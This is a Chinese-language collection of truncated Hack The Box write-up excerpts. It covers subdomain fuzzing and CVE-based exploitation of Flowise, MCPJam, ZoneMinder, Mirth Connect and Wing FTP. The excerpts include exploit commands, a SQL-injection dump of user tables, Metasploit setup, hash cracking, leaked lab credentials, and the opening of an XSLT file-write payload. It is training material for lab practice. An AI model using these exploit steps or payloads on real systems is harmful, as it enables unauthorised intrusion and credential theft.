HTB
Linux机器 依旧 80 22端口 80端口是没东西的 就一个html网页,然后上面有几个人物介绍 子域名 直接子域名扫一下 ffuf -w SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.20.31 -H "Host: FUZZ.silentium.htb" -fc 301 有一个staging,加一下host看看 Flowise-AI 资产是Flowise 不是很熟悉,直接问AI ,有一个接口可以查看版本号 http://staging.silentium.htb/api/v1/version 找一下是否有rce漏洞,还有好几个 搜一下poc什么的,发现就这个CVE-2025-59528可能性最大,是一个组合链,
HTB
Linux机器有这些端口 80端口无资产信息 3552端口,Arcane 有CVE-2026-23944 不过打不了,尝试弱口令也不行,只能先搁置一下 没思路再看看子域名,有两个 ffuf -w SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -u https://kobold.htb -H "Host: FUZZ.kobold.htb" -fc 302 有ssl的话记得加https,不然都是301 加上host后能发现mcp这个是一个mcpjam 有且只有一个漏洞 在setting里面能看到版本号也是满足的 CVE-2026-23744 在github上能找打poc,不过找到的现成的脚本不太适合这个,漏洞实现也能简单直接curl就是 curl -k -X POST https://mcp.kobold.htb/api/mcp/connect
HTB
Linux机器,80 22端口 初始页面是没什么资产信息的,点这个登录会跳到ZoneMinder 弱口令手测一下发现是admin admin,登录后有版本信息 第一个试了不行,打的第二个CVE CVE-2024-51482 https://github.com/plur1bu5/CVE-2024-51482-PoC python zm.py -t cctv.htb -u admin -p admin -D zm -T Users --dump --threads 20 前面还需要测数据库名然后表,这里都是默认的,直接dump,盲注很man~ 三个,通常来说都是爆第二个mark为普通用户.这里都爆了一下,第一个admin没有,第三个就是admin密码,第二个 hashcat -m 3200 '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/
HTB
Linux机器,22 80 443 端口,其实还有一个神秘的6661端口,测半天不知道干嘛的 资产是Mirth Connect,下面这个什么2021 的就感觉应该是有现成的CVE ,找了一下就俩CVE-2023-43208 和 CVE-2023-37679 CVE-2023-43208 找到exp https://github.com/jakabakos/CVE-2023-43208-mirth-connect-rce-poc/tree/master 我用这里面的探测脚本发现版本是4.4.0 有CVE-2023-43208 ,不过用这个exp的时候发现死活不行,看了下poc发现可能是上线命令复杂的原因?后面懒得折腾就试了试MSF msfconsole use exploit/multi/http/mirth_connect_cve_2023_43208 set RHOSTS 10.129.x.x set RPORT 443 set
HTB
Linux机器,只开放了80和22端口. 点右上角那个会到一个子域,写一下host即可 nuclei一扫就出了CVE 直接看后一个严重等级的能rce CVE-2025-47812 CVE-2025-47812/exploit.py at main · blindma1den/CVE-2025-47812Contribute to blindma1den/CVE-2025-47812 development by creating an account on GitHub.GitHubblindma1den 进去之后发现是类似www-data这种权限,然后user.txt根本拿不到,说明不是提权,还需要找一个正常用户的凭证,先看看/etc/passwd 并且home目录有这个wacky,应该就是这个用户了 凭证搜集-wacky 找到wing FTP的安装路径,在里面各种找凭证,反正一通找,在/opt/wftpserver/Data/1/users 下面找到wacky.xml,当时用hashcat爆破这个sha256的哈希爆破不出来 后面找到上一级目录的settin
HTB
情人节一个人听点欢快的 MOTTAI0:00/160.5202951× config.background_music.name = "MOTTAI" config.background_music.vocal_type = "High-Pitched / Tsundere" config.background_music.lyrics.core_concept = "Wasteful if not loved" 分很低,赤赤看 Linux机器,就只有80端口和22端口,加一个host echo '10.129.2.190 pterodactyl.htb' >> /etc/
HTB
Airwaves0:00/1921× config.background_music.name = "Airwaves" config.background_music.style = "soothing" 依旧设置host解析 echo '10.129.10.4 facts.htb' >> /etc/hosts 信息搜集 Liunx机器,前面nmap扫只有22和80端口,80端口资产不明,扫目录扫出了admin路由. ffuf -w common.txt -u http://facts.htb/FUZZ -ignore-body -fc 404 这里用的是https://github.
HTB
之前打了没写,今天重新打一遍 有初始凭据 As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH 域名解析 echo "10.10.11.90 signed.htb DC01.signed.htb" >
HTB
写host echo "10.10.11.98 monitorsfour.htb DC01.monitorsfour.htb" >> /etc/hosts; Nmap 80端口一个网站,不是什么主流框架 Dirsearch 有一个.env泄露 DB_HOST=mariadb DB_PORT=3306 DB_NAME=monitorsfour_db DB_USER=monitorsdbuser DB_PASS=f37p2j8f4t0r 不过3306端口没有开在外网 里面的contact有一个报错 user有信息 这里尝试一下传一下token参数,GET传参时发现字母或者除0以外的数字都没反应 传0的时候回显出了信息 [{"id":2,"
HTB
原始凭据 As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw! 设置域名解析 echo "10.10.11.95 eighteen.htb DC01.eighteen.htb" >> /etc/hosts Nmap 扫描发现有80端口和1443端口(Mssql) Mssql 给的凭据是Mssql的,80 web端测试后发现没东西呀,后台也登不上。先看看mssql,
HTB
扫描发现只有一个80端口和22端口 访问80端口 web服务,先注册一个账号,登录即可 里面可以传xml和xslt文件,/about 路由里面有源码,分析源码会发现这里有一个xslt注入,另外有一个定时任务 每分钟会定时执行python脚本 ,因为是python起的服务加上机器是linux的,rce的话不太现实。所以说这里的思路是通过xslt注入实现任意文件写,xslt注入可以通过EXSLT拓展实现任意文件写 <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exp="http://exslt.org/common" extension-element-prefixes=